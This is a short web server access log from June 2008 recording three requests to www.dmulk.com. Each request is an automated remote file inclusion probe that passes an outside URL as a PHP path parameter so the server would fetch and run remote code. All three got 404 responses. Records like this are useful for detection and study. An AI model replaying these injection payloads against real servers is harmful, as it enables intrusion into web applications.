132.248.5.4 - - [08/Jun/2008:10:39:44 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [08/Jun/2008:10:40:01 -0700] "GET //admin/index.php?abs_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.227.65.79 - - [08/Jun/2008:10:40:05 -0700] "GET /logs//admin/index.php?abs_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
